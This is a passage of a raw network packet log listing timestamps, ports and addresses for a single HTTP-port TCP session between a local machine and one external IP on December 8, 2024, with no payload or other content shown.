Dec 8, 2024 19:52:29.265928984 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.266603947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.266661882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.266695976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.266732931 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.267410040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.267462969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.267544985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.267585039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.268208981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.268256903 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.268321991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.268363953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.269048929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.269093990 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.269176960 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.269227982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.269948959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.269989014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.270164967 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.270239115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.270720959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.270767927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.270937920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.270981073 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.271841049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.271883011 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.272196054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.272239923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.272675037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.272742987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.272762060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.272797108 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.273205996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.273256063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.273298025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.273341894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.273917913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.273967028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.274089098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.274131060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.274749994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.274792910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.274808884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.274849892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.275623083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.275665045 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.275762081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.275803089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.276329041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.276369095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.276537895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.276578903 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.277153969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.277164936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.277194023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.277204990 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.277966022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.278002977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.278058052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.278090954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.278835058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.278877020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.278960943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.279006004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.279643059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.279695034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.279743910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.279786110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.280467987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.280484915 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.280512094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.280523062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.281383038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.281426907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.281506062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.281553984 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.282136917 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.282176018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.282197952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.282242060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.282838106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.282883883 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.282982111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.283020973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.283636093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.283734083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.283750057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.283807039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.284461975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.284508944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.457055092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.457115889 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.457124949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.457158089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.457365036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.457401991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.457468987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.457515955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.458117008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.458168983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.458506107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.458518028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.458550930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.458575010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.459297895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.459348917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.459431887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.459476948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.460277081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.460323095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.460459948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.460503101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.461047888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.461092949 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.461159945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.461204052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.461885929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.461935043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.461981058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.462022066 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.462595940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.462641954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.462747097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.462789059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.463310957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.463355064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.463383913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.463422060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.464169979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.464214087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.464248896 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.464292049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.464962959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.465008020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.465080023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.465122938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.465742111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.465785980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.465832949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.465873957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.466542006 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.466588020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.466605902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.466645956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.467376947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.467438936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.467472076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.467511892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.468188047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.468230963 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.468388081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.468430996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.469007969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.469034910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.469050884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.469074011 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.469820976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.469865084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.469896078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.469937086 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.470716000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.470762014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.470776081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.470818996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.471419096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.471471071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.471630096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.471674919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.472274065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.472340107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.472377062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.472419024 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.473048925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.473100901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.473126888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.473169088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.473865032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.473906040 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.473952055 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.473999023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.474694014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.474735022 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.474802017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.474843979 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.475625038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.475671053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.475675106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.475712061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.476324081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.476372004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.476448059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.476492882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.477107048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.477154016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.477241993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.477286100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.477931976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.477974892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.478033066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.478074074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.478802919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.478848934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.478877068 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.478914022 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.479552984 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.479595900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.479650974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.479695082 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.480433941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.480478048 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.480504990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.480545044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.481168985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.481211901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.481296062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.481338978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.481993914 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.482038975 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.482120991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.482162952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.482811928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.482858896 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.482934952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.482979059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.483623981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.483669043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.483737946 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.483778954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.484466076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.484509945 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.484580040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.484621048 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.485239029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.485280991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.485441923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.485491991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.486107111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.486150026 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.486341000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.486386061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.486884117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.486931086 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.486996889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.487040997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.487751961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.487796068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.487812042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.487857103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.488878965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.488924980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.489022970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.489068985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.489610910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.489655018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.489667892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.489697933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.490111113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.490155935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.490271091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.490305901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.491107941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.491127014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.491163015 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.491182089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.491751909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.491807938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.491923094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.491970062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.492669106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.492723942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.492861986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.492908001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.493886948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.493940115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.493968010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.494003057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.494823933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.494862080 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.494972944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.495012999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.495538950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.495583057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.495646000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.495682001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.496350050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.496392965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.496547937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.496593952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.497270107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.497313023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.497395992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.497432947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.498140097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.498205900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.498207092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.498236895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.498795986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.498836040 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.498936892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.498979092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.499563932 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.499603987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.499630928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.499669075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.649399042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.649425983 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.649451971 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.649492979 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.649677992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.649701118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.649714947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.649739981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.650564909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.650583982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.650604963 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.650629997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.651246071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.651287079 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.651344061 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.651386976 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.651999950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.652049065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.652065039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.652101994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.652798891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.652843952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.652854919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.652889967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.653578043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.653636932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.653703928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.653748989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.654419899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.654462099 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.654524088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.654562950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.655239105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.655281067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.655353069 CET	80	49748	185.215.113.206	192.168.2.4
